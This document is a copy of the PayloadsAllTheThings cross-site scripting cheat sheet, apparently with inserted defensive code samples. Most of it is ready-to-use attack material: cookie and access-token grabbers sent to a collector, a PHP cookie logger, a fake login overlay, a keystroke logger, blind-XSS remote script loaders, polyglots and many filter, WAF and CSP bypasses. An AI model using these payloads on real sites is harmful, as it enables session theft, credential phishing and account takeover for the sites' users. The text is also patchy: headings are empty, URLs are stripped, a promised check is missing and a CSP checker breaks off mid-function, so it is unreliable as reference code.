PayloadsAllTheThings/XSS Injection/

# Cross Site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
## Summary

- [Exploit code or POC](#exploit-code-or-poc)
  - [Data grabber for XSS](#data-grabber-for-xss)
  - [UI redressing](#ui-redressing)
  - [Javascript keylogger](#javascript-keylogger)
  - [Other ways](#other-ways)
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
- [XSS in HTML/Applications](#xss-in-htmlapplications)
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
- [XSS in PostMessage](#xss-in-postmessage)
- [Blind XSS](#blind-xss)
  - [XSS Hunter](#xss-hunter)
  - [Other Blind XSS tools](#other-blind-xss-tools)
  - [Blind XSS endpoint](#blind-xss-endpoint)
- [Mutated XSS](#mutated-xss)
- [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
  - [Bypass case sensitive](#bypass-case-sensitive)
  - [Bypass tag blacklist](#bypass-tag-blacklist)
  - [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation)
  - [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag)
  - [Bypass quotes for string](#bypass-quotes-for-string)
  - [Bypass quotes in script tag](#bypass-quotes-in-script-tag)
  - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
  - [Bypass dot filter](#bypass-dot-filter)
  - [Bypass parenthesis for string](#bypass-parenthesis-for-string)
  - [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
  - [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist)
  - [Bypass space filter](#bypass-space-filter)
  - [Bypass email filter](#bypass-email-filter)
  - [Bypass document blacklist](#bypass-document-blacklist)
  - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
  - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect)
  - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
  - [Bypass ">" using nothing](#bypass--using-nothing)
  - [Bypass ";" using another character](#bypass--using-another-character)
  - [Bypass using HTML encoding](#bypass-using-html-encoding)
  - [Bypass using Katana](#bypass-using-katana)
  - [Bypass using Lontara](#bypass-using-lontara)
  - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
  - [Bypass using Octal encoding](#bypass-using-octal-encoding)
  - [Bypass using Unicode](#bypass-using-unicode)
  - [Bypass using UTF-7](#bypass-using-utf-7)
  - [Bypass using UTF-8](#bypass-using-utf-8)
  - [Bypass using UTF-16be](#bypass-using-utf-16be)
  - [Bypass using UTF-32](#bypass-using-utf-32)
  - [Bypass using BOM](#bypass-using-bom)
  - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation)
- [CSP Bypass](#csp-bypass)
- [Common WAF Bypass](#common-waf-bypass)

## Exploit code or POC

### Data grabber for XSS

To obtain the administrator's cookie or a sensitive access token, the following payloads send it to an attacker-controlled page (`localhost` here; replace it with your collector).

```html
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
```

Write the collected data into a file.

```php
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' . $cookie . "\r\n"); // double quotes, so \r\n is a real line break
fclose($fp);
```

### UI redressing

Leverage the XSS to modify the HTML content of the page in order to display a fake login form. `history.replaceState` rewrites the address bar so the URL looks like the real login page.

```javascript
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "<br><br><br><br><br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'><input value='submit' type='submit'></form>"
```

### Javascript keylogger

Another way to collect sensitive data is to set a javascript keylogger. Every keypress is sent to the URL given as the first argument of `fetch` (left empty here); `this.remove()` deletes the broken image so nothing visible remains.

```html
<img src=x onerror='document.onkeypress=function(e){fetch(""+String.fromCharCode(e.which))},this.remove();'>
```

### Other ways

More exploits:

- Taking screenshots using XSS and the HTML5 Canvas
- JavaScript Port Scanner
- Network Scanner
- .NET Shell execution
- Redirect Form
- Play Music

## Identify an XSS endpoint
## XSS in HTML/Applications

XSS Basic

Basic payload

Img payload

```html
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
```

The `oneonerrorrror` variant survives a filter that deletes the string `onerror` once: the surrounding letters re-form the attribute name. The `src=x:alert(alt)` variant keeps the call out of the handler and evaluates it from the `src` attribute instead.

Svg payload

```html
<svg onload=alert(1)>
<svg onload=alert(1)//
<svg id=alert(1) onload=eval(id)>
<svg><script href=data:,alert(1) />
```

Firefox is the only browser which allows the self-closing `<script />` used in the last payload.

Div payload

```html
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
```

Other elements and events (the `autofocus` ones fire without user interaction):

```html
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)> // Triggers when a finger touches the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from the touch screen
<body ontouchmove=alert(1)> // Triggers when a finger is dragged across the screen
```

XSS using script tag (external payload)

you can also specify an arbitrary payload with

XSS in Hidden input

```html
<input type="hidden" accesskey="X" onclick="alert(1)">
```

Use CTRL+SHIFT+X to trigger the onclick event (the access-key modifier differs per browser and operating system).

```html
#"><img src=/ onerror=alert(2)>
```

XSS in JS Context (payload without quote/double quote from @brutelogic)

```javascript
; alert(1);//
```

```
URL/<svg onload=alert(1)>
URL/<input autofocus onfocus=alert(1)>
```

## XSS in wrappers javascript and data URI

XSS with javascript:

We can encode the "javascript:" in Hex/Octal

We can use a 'newline character': browsers strip tab, LF and CR from inside a URL scheme, so the following are still parsed as `javascript:`.

```
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r)
```

Using the escape character

Using the newline and a comment //

XSS with data:

```html
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
```

The base64 decodes to `alert(document.domain)`.

XSS with vbscript: only IE

## XSS in files

**NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.

### XSS in XML

```xml
<something:script xmlns:something="">alert(1)</something:script>
```

### XSS in SVG

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">
<svg version="1.1" baseProfile="full" xmlns="">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
   </script>
</svg>
```

### XSS in SVG (short)

```xml
<svg xmlns="" onload="alert(document.domain)"/>
```

### XSS in Markdown

```
[a](j a v a s c r i p t:prompt(document.cookie))
```

Relies on a renderer or sanitizer that removes the spaces from the link scheme before emitting the `href`; browsers themselves only strip tab, LF and CR.

### XSS in SWF flash application

Browsers other than IE:

more payloads in ./files

```
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src=""/></a>&.swf
```

### XSS in CSS

```html
<!DOCTYPE html>
<html>
<head>
<style>
div {
  background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
  background-color: #cccccc;
}
</style>
</head>
<body>
<div></div>
</body>
</html>
```

## XSS in PostMessage

> If the target origin is asterisk * the message can be sent to any domain that has a reference to the child page.

The receiving page is vulnerable when its `message` handler does not check `event.origin` and passes `event.data.url` to `location`.

```html
<input type=button value="Click Me" id="btn">
<script>
document.getElementById('btn').onclick = function(e){
    window.poc = window.open(''); // URL of the page that listens for the message
    setTimeout(function(){
        window.poc.postMessage({
            "sender": "accounts",
            "url": "javascript:confirm('XSS')",
        }, '*');
    }, 2000);
}
</script>
```
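The receiving side of the exchange above, written the way a hardened listener should be. This is an added example, not code from PayloadsAllTheThings or from the reported target; the allowed origin, the base URL and the `{sender, url}` message shape are assumptions.

```javascript
// Added example (not from PayloadsAllTheThings): hardened postMessage receiver.
// ALLOWED_ORIGINS, BASE_URL and the message shape are assumptions for the demo.

const ALLOWED_ORIGINS = new Set(["https://accounts.example.com"]); // assumed
const BASE_URL = "https://app.example.com/";                      // assumed

// Returns the URL the page may navigate to, or null if the message is rejected.
function handleMessage(event) {
  // 1. Origin check: only a sender that controls this origin can pass it.
  if (!ALLOWED_ORIGINS.has(event.origin)) return null;

  // 2. Shape check: reject anything that is not the expected object.
  const data = event.data;
  if (!data || typeof data !== "object") return null;
  if (data.sender !== "accounts" || typeof data.url !== "string") return null;

  // 3. Scheme check: even a trusted sender must not make us navigate to
  //    javascript: (or data:, blob:, vbscript:), which is code, not a location.
  let target;
  try {
    target = new URL(data.url, BASE_URL); // resolves relative paths too
  } catch (e) {
    return null;
  }
  if (target.protocol !== "https:" && target.protocol !== "http:") return null;
  return target.href;
}

// The vulnerable pattern for comparison: no origin check, raw assignment.
function handleMessageUnchecked(event) {
  return event.data.url; // the real page does location.href = event.data.url
}

// Constructed messages standing in for the MessageEvent the browser delivers.
const fromAttacker = {
  origin: "https://attacker.example",
  data: { sender: "accounts", url: "javascript:confirm('XSS')" },
};
const fromTrusted = {
  origin: "https://accounts.example.com",
  data: { sender: "accounts", url: "/settings" },
};

// Wiring in a real page:
//   window.addEventListener("message", (e) => {
//     const u = handleMessage(e); if (u) location.href = u;
//   });
// and the sender should name the target instead of "*":
//   otherWindow.postMessage(msg, "https://app.example.com");
```

The three checks are independent: the origin check stops the cross-site sender, the scheme check stops a compromised or buggy trusted sender from smuggling `javascript:`, and neither replaces the other.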
## Blind XSS

### XSS Hunter

> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.

```javascript
"><script src=//></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//");a.send();</script>
```

The empty `src` values and bare `//` are where the probe host goes.

### Other Blind XSS tools

- sleepy-puppy - Netflix
- bXSS - LewisArdern
- BlueLotus_XSSReceiver - FiresunCN
- ezXSS - ssl

### Blind XSS endpoint

- Contact forms
- Ticket support
- Referer Header
- User Agent
- Custom Site Analytics
- Administrative Panel logs
- Comment Box
- Administrative Panel

## Mutated XSS

Use browser parsing quirks to recreate HTML tags when a string is inserted through `element.innerHTML`: the markup a sanitizer serialises is not the markup the browser ends up with after re-parsing it, so a payload that looks inert to the sanitizer becomes live in the DOM.

Mutated XSS from Masato Kinugawa, used against the DOMPurify component on Google Search (see the mXSS paper in the references).

```html
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
```

With scripting enabled the browser treats the content of `<noscript>` as raw text, so the `</noscript>` inside the `title` attribute ends the element and the `<img>` is parsed as a real tag. A sanitizer (or any parser with scripting disabled) parses the `<noscript>` children as normal markup, where the whole `<img ...>` is just the value of `title`.

## Polyglot XSS

Polyglot XSS - 0xsobky

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```

Polyglot XSS - Ashar Javed

```
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script><isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //">
```

Polyglot XSS - Mathias Karlsson

```
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
```

Polyglot XSS - Rsnake

```
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```

Polyglot XSS - Daniel Miessler

```
“ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script><isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
```

Polyglot XSS - @s0md3v

```
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
```

Polyglot XSS - from @filedescriptor's Polyglot Challenge

```
# by crlf
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
# by europa
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
# by EdOverflow
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
# by h1/ragnar
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
```

## Filter Bypass and exotic payloads

### Bypass case sensitive

### Bypass tag blacklist

```html
<script x>
<script x>alert('XSS')<script y>
```

### Bypass word blacklist with code evaluation

```javascript
new Function`al\ert\`6\``;
```

Inside a template literal `\e` is just `e`, so the word `alert` never appears literally in the payload; the tagged template hands the string `` alert`6` `` to `Function`, which builds and runs it.

### Bypass with incomplete html tag

Works on IE/Firefox/Chrome/Safari

```html
<img src='1' onerror='alert(0)' <
```

### Bypass quotes for string

### Bypass quotes in script tag

```php
<?php echo 'foo="text '.$_GET['test'].'";'; ?>
```

Escaping the quotes is not enough here: the HTML parser ends the script block at the first `</script>` it sees, whatever the JavaScript string state (see "Bypass using javascript inside a string" below).

### Bypass quotes in mousedown event

You can bypass a single quote with `&#39;` in an onmousedown event handler: the browser decodes the HTML entity before the JavaScript engine sees the attribute value.

```html
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
```

### Bypass dot filter

Convert the IP address into decimal format, i.e. `http://192.168.1.1` == `http://3232235777` (192·2^24 + 168·2^16 + 1·2^8 + 1).

### Bypass parenthesis for string

### Bypass parenthesis and semi colon

```html
// From @garethheyes
// window.onerror receives the error message as its first argument, so alert("Uncaught 1337") fires
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>

// From @terjanq

// From @cgvwzq
// The error name is prefixed to the message eval'd by onerror, producing "Uncaught =/: ... '/-alert(1)//' ...", which is valid JavaScript
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```

### Bypass onxxxx= blacklist

```html
// Firefox-only events
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
```

```html
// Bypass onxxx= filter with a null byte/vertical tab
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
```

```html
// Bypass onxxx= filter with a '/'
<img src='1' onerror/=alert(0) />
```

### Bypass space filter

```html
// Bypass space filter with "/"
```

```html
// Bypass space filter with 0x0c/^L (the visible spaces below are form feeds)
<svg onload = alert(1) >
```

```
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c  <svg.onload.=.al
00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
```

### Bypass email filter

(RFC compliant)

### Bypass document blacklist

```html
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
```

An element with an `id` becomes a global variable; walking `parentNode` three times (div, body, html) reaches `document` without ever writing the word.

### Bypass using javascript inside a string

```javascript
foo="text </script><script>alert(1)</script>";
```

The HTML parser closes the `<script>` element at the first `</script>` regardless of whether JavaScript is inside a string literal, so quote escaping alone does not protect a value written into a script block.
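The break described above, and the PHP template in "Bypass quotes in script tag", both fail for the same reason; the added example below (not code from the original page) models the tokenizer behaviour and contrasts quote-only escaping with an encoder that makes a value safe inside a JavaScript string literal. The template string and the `scriptBodies` tokenizer model are this example's own assumptions.

```javascript
// Added example (not from PayloadsAllTheThings): why escaping quotes alone is
// not enough inside a <script> block, and what a correct encoder does.

// Naive server-side escaping: only quotes and backslashes (addslashes-style).
function escapeQuotesOnly(s) {
  return s.replace(/\\/g, "\\\\").replace(/"/g, '\\"').replace(/'/g, "\\'");
}

// Correct encoding for a JS string literal: everything that is not
// alphanumeric or a space becomes a \uXXXX escape, so "<", "/" and ">"
// can never be read as markup by the HTML tokenizer.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9 ]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// The template from the section above (assumed): <script>var foo="text USER";</script>
function renderScript(user, encoder) {
  return '<script>var foo="text ' + encoder(user) + '";</script>';
}

// Minimal model of the HTML tokenizer: a script block ends at the first
// "</script", with no knowledge of JavaScript string state.
function scriptBodies(html) {
  const out = [];
  const re = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Constructed input: the payload from the section above.
const payload = '</script><script>alert(1)</script>';

// Quote-only escaping leaves "<" and "/" alone, so the payload splits the
// block in two and the second block is attacker-controlled JavaScript.
const weak = renderScript(payload, escapeQuotesOnly);

// \uXXXX encoding yields a single script block whose string value, once the
// JS engine decodes the escapes, is exactly the original payload text.
const safe = renderScript(payload, encodeForJsString);
```

`JSON.parse` is used in the check below only as a convenient decoder of `\uXXXX` escapes; the same decoding is what the JavaScript engine does when it evaluates the literal.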
### Bypass using an alternate way to redirect

```javascript
document.location = ""
```

### Bypass using an alternate way to execute an alert

From @brutelogic tweet.

From @theMiddle - Using global variables

The `Object.keys()` method returns an array of a given object's own property names, in the same order as a `for...in` loop. That means we can call any global function by its **index number instead of its name**.

```javascript
c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
// 5
```

Then calling alert is:

```javascript
Object.keys(self)[5]
// "alert"
self[Object.keys(self)[5]]("1") // alert("1")
```

The index depends on the browser and on what the page has already defined, so we find "alert" with a regular expression like `^a[rel]+t$` instead:

```javascript
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()
// then you can use a() with Object.keys
self[Object.keys(self)[a()]]("1") // alert("1")
```

```javascript
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
```

From @quanyang tweet.

From @404death tweet.

```javascript
new Function`al\ert\`6\``;
```

Bypass using an alternate way to trigger an alert

A freshly created iframe has its own, unmodified `window`, so its `alert` is not affected by a proxy installed on the top window:

```javascript
var i = document.createElement("iframe");
i.onload = function(){
  i.contentWindow.alert(1);
}
document.body.appendChild(i);
```

The proxy being bypassed:

```javascript
// Bypassed security
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
    var proxy = obj[name];
    obj[name] = function () {
        if (exec_original) {
            return proxy.apply(this, arguments);
        }
    };
    XSSObject.lockdown(obj, name);
};
XSSObject.proxy(window, 'alert', 'window.alert', false);
```

### Bypass ">" using nothing

You don't need to close your tags.

```html
<svg onload=alert(1)//
```

### Bypass ";" using another character

Any binary operator (or `,`, `?:`, `in`, `instanceof`) can join the injected call to the surrounding string expression:

```javascript
'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt';
'te' - alert('-') - 'xt';
'te' + alert('+') + 'xt';
'te' ^ alert('^') ^ 'xt';
'te' > alert('>') > 'xt';
'te' < alert('<') < 'xt';
'te' == alert('==') == 'xt';
'te' & alert('&') & 'xt';
'te' , alert(',') , 'xt';
'te' | alert('|') | 'xt';
'te' ? alert('ifelsesh') : 'xt';
'te' in alert('in') in 'xt';
'te' instanceof alert('instanceof') instanceof 'xt';
```

### Bypass using HTML encoding

`%26%2397%3B` URL-decodes to `&#97;`, which the HTML parser turns into `a`, and so on for the other letters: the word `alert` never appears in the request.

```html
></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
```

### Bypass using Katana

Using the Katakana library.

### Bypass using Lontara

More alphabets on

### Bypass using ECMAScript6

### Bypass using Octal encoding

### Bypass using Unicode

These substitutions occur when the application normalises input (for instance NFKC) or best-fit converts it to a legacy charset after validation has already run:

```
Unicode character U+FF1C FULLWIDTH LESS-THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS-THAN SIGN (<)
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
```

E.g.:

```
%EF%BC%9E becomes >
%EF%BC%9C becomes <
```

Bypass using Unicode converted to uppercase

Case conversion is not one-to-one: the characters below map to plain ASCII letters only in one direction, so a filter that matches after lowercasing misses a string that a later `toUpperCase()` turns into a blacklisted tag, and vice versa.

```
İ (%c4%b0).toLowerCase() => i (in JavaScript: i followed by U+0307 COMBINING DOT ABOVE)
ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf).toUpperCase() => S
K (%E2%84%AA).toLowerCase() => k
```

```
<ſvg onload=... > becomes <SVG ONLOAD=...>
<ıframe id=x onload=>.toUpperCase() becomes <IFRAME ID=X ONLOAD=>
```
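An added example (not from the original page) of a blacklist that case-folds before matching and the probes above that get past it in each direction. The tag list and the two filter functions are this example's own assumptions; the case mappings are Unicode's.

```javascript
// Added example (not from PayloadsAllTheThings): case-folding blacklists
// versus one-directional Unicode case mappings. Filter logic is assumed.

// Filter A: lowercase the input, then look for forbidden tag names.
function passesLowercaseFilter(input) {
  const blocked = ["<svg", "<iframe", "<script"];
  const lower = input.toLowerCase();
  return !blocked.some((t) => lower.includes(t));
}

// Filter B: the same idea written with toUpperCase().
function passesUppercaseFilter(input) {
  const blocked = ["<SVG", "<IFRAME", "<KEYGEN"];
  const upper = input.toUpperCase();
  return !blocked.some((t) => upper.includes(t));
}

// Constructed probes using the characters from the section above.
const longS   = "<\u017Fvg onload=alert(1)>";               // ſ  : toUpperCase() -> S, toLowerCase() unchanged
const dotless = "<\u0131frame id=x onload=alert(1)>";       // ı  : toUpperCase() -> I, toLowerCase() unchanged
const kelvin  = "<\u212Aeygen autofocus onfocus=alert(1)>"; // K (U+212A Kelvin sign): toLowerCase() -> k, toUpperCase() unchanged

// What a later layer (template helper, database collation, another
// normalisation step) turns the accepted string into.
function afterUpper(input) { return input.toUpperCase(); }
function afterLower(input) { return input.toLowerCase(); }

// Filter A never sees "<svg" in longS or "<iframe" in dotless, yet an
// uppercase pass afterwards yields "<SVG ..." / "<IFRAME ...".
// Filter B never sees "<KEYGEN" in kelvin, yet a lowercase pass yields "<keygen ...".
```

The fix is to decide the case folding once, apply the same fold at the point where the value is finally used, and compare with `toLowerCase()` and `toUpperCase()` both, or better, reject rather than fold characters outside the expected alphabet.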
### Bypass using UTF-7

Only works when the page is decoded as UTF-7 (no declared charset and a browser that still sniffs it, i.e. old IE).

```
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
```

### Bypass using UTF-8

The first four lines are overlong (non-shortest-form) encodings; a conforming decoder rejects them, so they only work against a lenient decoder that runs after the filter.

```
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
" = %CA%BA
' = %CA%B9
```

### Bypass using UTF-16be

### Bypass using UTF-32

### Bypass using BOM

Byte Order Mark (the page must begin with the BOM character). A BOM at the very start of the response overrides the declared charset in browsers, so the rest of the body is decoded as UTF-16 or UTF-32 and the `%00`-padded payload below reads as `<svg/onload=alert()>`.

```
BOM Character for UTF-16 Encoding:
   Big Endian : 0xFE 0xFF
   Little Endian : 0xFF 0xFE
   XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E

BOM Character for UTF-32 Encoding:
   Big Endian : 0x00 0x00 0xFE 0xFF
   Little Endian : 0xFF 0xFE 0x00 0x00
   XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```

### Bypass using weird encoding or native interpretation

Event-handler attributes are HTML-entity-decoded before the JavaScript engine sees them, and `javascript:` URLs are percent-decoded before evaluation:

```html
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
```

## CSP Bypass

Check the CSP with Google's CSP Evaluator and read the post "How to use Google's CSP Evaluator to bypass CSP".

### Bypass CSP using JSONP from Google (Trick by @apfeifer27)

Any allow-listed host that serves a JSONP endpoint lets the attacker choose the callback, which is executed as script under `'self'`-style policies. More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)

### Bypass CSP with a same-origin iframe

Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`. A policy applies per document: the iframe loads a same-origin resource (`/robots.txt`) that is served without a CSP header, and a remote `<script>` is appended to that document instead of the policed one.

```javascript
f=document.createElement("iframe");f.id="pwn";f.src="/robots.txt";f.onload=()=>{x=document.createElement('script');x.src='//';pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);
```

### Bypass CSP by Rhynorater

### Bypass CSP by @akita_zen

Works for CSP like `script-src 'self'` with no `object-src` or `default-src`, so the `<object>` is allowed and the inline script runs in the nested `data:` document. Browsers that apply the embedding document's policy to `data:` documents block this, so test it per browser.

```html
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
```

The base64 decodes to `<script>alert(1)</script>`.

### Bypass CSP by @404death

Works for CSP like `script-src 'self' data:`

```html
<script ?/src="data:+,\u0061lert%281%29">/</script>
```
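An added checker (not code from the original page, and far smaller than Google's CSP Evaluator) that parses a `Content-Security-Policy` header and flags the script-src weaknesses the bypasses in this section rely on. The JSONP host list and the exact findings are this example's own assumptions.

```javascript
// Added example (not from PayloadsAllTheThings): a minimal CSP checker for the
// weaknesses used by the bypasses above. JSONP_HOSTS is an assumed sample list.

const JSONP_HOSTS = ["www.google.com", "accounts.google.com"]; // assumed; see Intruders/jsonp_endpoint.txt

// "name src src; name src" -> { name: [src, src], ... }
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(";")) {
    const parts = directive.trim().split(/\s+/).filter(Boolean);
    if (parts.length === 0) continue;
    policy[parts[0].toLowerCase()] = parts.slice(1);
  }
  return policy;
}

// Host part of a source expression ("https://www.google.com/x" -> "www.google.com").
function hostOf(source) {
  return source.replace(/^[a-z][a-z0-9+.-]*:\/\//i, "").split("/")[0].toLowerCase();
}

function cspWeaknesses(header) {
  const policy = parseCsp(header);
  const findings = [];

  // script-src falls back to default-src; with neither, anything runs.
  const script = policy["script-src"] || policy["default-src"];
  if (!script) {
    findings.push("no script-src or default-src: any script may run");
    return findings;
  }
  const src = script.map((s) => s.toLowerCase());

  // 'unsafe-inline' is only neutralised when a nonce or hash is also present.
  const hasNonceOrHash = src.some((s) => s.startsWith("'nonce-") || s.startsWith("'sha"));
  if (src.includes("'unsafe-inline'") && !hasNonceOrHash)
    findings.push("'unsafe-inline' without nonce/hash: inline scripts and event handlers run");

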